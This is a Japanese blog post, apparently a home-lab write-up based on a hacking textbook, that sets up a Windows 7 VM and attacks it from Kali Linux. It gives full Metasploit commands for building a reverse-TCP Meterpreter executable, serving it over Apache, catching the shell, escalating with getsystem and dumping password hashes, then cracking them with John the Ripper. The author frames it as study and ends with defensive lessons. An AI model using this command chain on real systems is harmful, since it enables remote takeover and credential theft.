MetasploitとJohn The Ripperでパスワード解析してみた(対象Win7)

参考文献:IPUSIRON著「ハッキング・ラボのつくりかた」
ではVirtualBOXを使用していましたが、私の環境はESXi6.5なので
ESXiにWin7のイメージをインポートしてみました。

1.環境
Kali Linux:192.168.0.15
Windows7(IE8)64bit:192.168.0.26

2.手順

2-1.Windows7の準備
下記URLよりWin7のイメージをダウンロード
https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/

IE8 on Win7(x86)
VMware(Windows,Mac)
を選択してダウンロード

ESXi6.5にてOVFのインポートをしようとすると、
下記のようなエラーが出てインポートできません。

対策として、

IE8-Win7-VMWare.ovf をテキストエディタで開いて、下記を削除

      <Item>
        <rasd:Address>0</rasd:Address>
        <rasd:Description>SATA Controller</rasd:Description>
        <rasd:ElementName>sataController0</rasd:ElementName>
        <rasd:InstanceID>3</rasd:InstanceID>
        <rasd:ResourceSubType>vmware.sata.ahci</rasd:ResourceSubType>
        <rasd:ResourceType>20</rasd:ResourceType>
      </Item>

IE8-Win7-VMWare.mf もテキストエディタで開いて、下記を削除

SHA256(IE8-Win7-VMWare.ovf)= a432628ee757c4329b908802c8b16c9e8a8df0b8a236288cef9e9c5fdc80660d

インポート成功です。

操作しずらいので、VMwareToolsをインストールしておきます。

書籍「ハッキングラボのつくりかた」に従い、
IPアドレス設定
WindowsUPdateの無効化
Windowsファイウォール設定(ping)
日本語キーボードドライバの適用
言語設定
を行います。

追加で、
時刻設定
リモートデスクトップ設定
Administratorアカウントの有効化(パスワードはPassw0rd!です)
も行います。

アカウント名:IEUser
パスワード:Passw0rd!
でRDP接続します。

Sysinternals Suite
https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite

Sysinternals Suiteを上記URLからダウンロードして、
RDPでWin7にアップロードして、zipを展開します。

64bitマシンなので、
Autoruns64.exe

を実行して、Everythingタブを表示。
File>Saveでautorun_baseline_yyyymmdd.arn
として初期状態を保存しておきます。

また、ESXiでスナップショットも取得しておきます。

2-2.MetasplitとJohn The Ripperの操作

Metasploitの起動
msfconsole

show exploits

search type:payload reverse_tcp platform:windows


8   payload/windows/meterpreter/reverse_tcp  normal No  Windows Meterpreter (Reflective Injection),
     Reverse TCP Stager

55  payload/windows/x64/meterpreter/reverse_tcp  normal No  Windows Meterpreter (Reflective Injection x64),
 Windows x64 Reverse TCP Stager

で2種類ありますが、対象が64bitなのでx64の方を使用します。

evil64.exeの作成
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.15 -f exe -o /root/evil64.exe

cd /var/www/html
mkdir share
cp /root/evil64.exe share
chmod -R 755 share

service apache2 restart

Windows側から下記にアクセス
http://192.168.0.15/share/

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.0.15
↑KaliのIPを指定します。

show options
LPORT 4444なのでport4444で待ち受けることがわかります。

exploit

Windows7側の操作

http://192.168.0.15/share/ にアクセスして、evll.exeをダウンロードして、Wクリックする。

Kali側でWindowsの操作ができるようになります。

Windowsのパスワードハッシュの取得
getuid
getsystem -t 1
getuid
run hashdump

run post/windows/gather/smart_hashdump GETSYSTEM=true

/root/.msf4/loot/20210101060733_default_192.168.0.26_windows.hashes_689472.txt
に出力されます。

exit
exit


cp -p /root/.msf4/loot/20210101060733_default_192.168.0.26_windows.hashes_689472.txt /root/hash_win7.txt

vi /usr/share/john/password.lst
Passw0rd!
を追記


john --wordlist=/usr/share/john/password.lst --format:NT hash_win7.txt
john --show --format:NT hash_win7.txt

見事にパスワードが取得できました。

失敗したときに前の情報を消すには、
rm /root/.john/john.pot
して下さい。

3.まとめ
書籍と少し違ってUUAC関連の操作は必要ありませんでしたが、
Win7でのパスワード解析は成功できました。
不明なEXEファイルをクリックしてしまう危険性が理解できました。
ルータやFWを挟んでいるから大丈夫じゃないんですね。
複数回パスワード誤りによるアカウントロックの設定や定期的なパスワード変更もバックドアが仕掛けられれば焼石に水と知りました。
危険なサイトのURLへのアクセス制限やフィッシングメール対策の方が防御の効果が大きいのではと感じました。

IPUSIRON著「ハッキング・ラボのつくりかた」の学習を進めていきます。

Comments are closed.